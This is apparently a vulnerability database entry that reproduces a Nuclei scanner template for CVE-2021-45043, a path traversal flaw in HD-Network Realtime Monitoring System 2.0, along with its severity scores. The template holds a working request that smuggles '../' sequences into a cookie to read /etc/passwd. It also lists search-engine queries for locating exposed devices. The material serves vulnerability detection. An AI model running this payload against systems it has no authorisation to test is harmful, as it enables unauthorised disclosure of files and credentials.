Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-45043
HistoryDec 13, 2021 - 8:52 p.m.

HD-Network Realtime Monitoring System 2.0 - Local File Inclusion

2021-12-1320:52:26
ProjectDiscovery
github.com
4

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.054 Low

EPSS

Percentile

93.2%

Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.

id: CVE-2021-45043

info:
  name: HD-Network Realtime Monitoring System 2.0 - Local File Inclusion
  author: Momen Eldawakhly,Evan Rubinstein
  severity: high
  description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in HD-Network Realtime Monitoring System 2.0.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45043
    - https://www.exploit-db.com/exploits/50588
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45043
    - https://cyberguy0xd1.medium.com/my-cve-2021-45043-lfi-write-up-441dad30dd7f
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-45043
    cwe-id: CWE-22
    epss-score: 0.05404
    epss-percentile: 0.93125
    cpe: cpe:2.3:a:hd-network_real-time_monitoring_system_project:hd-network_real-time_monitoring_system:2.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: hd-network_real-time_monitoring_system_project
    product: hd-network_real-time_monitoring_system
    shodan-query: http.title:"hd-network real-time monitoring system v2.0"
    fofa-query: title="hd-network real-time monitoring system v2.0"
    google-query:
      - intitle:"HD-Network Real-time Monitoring System V2.0"
      - intitle:"hd-network real-time monitoring system v2.0"
  tags: cve2021,cve,camera,edb,hdnetwork,lfi,iot,hd-network_real-time_monitoring_system_project

http:
  - raw:
      - |
        GET /language/lang HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}
        Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402203b7e44f07c89decaa411dd8b3c03703b519e0cf14eadef0ef756e5bd40301ceb02204cc7d53794c708a5ec88fc59273a2989bd5c3cbc73bb6aceeb7e07c21e0c5c64:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.054 Low

EPSS

Percentile

93.2%

Related for NUCLEI:CVE-2021-45043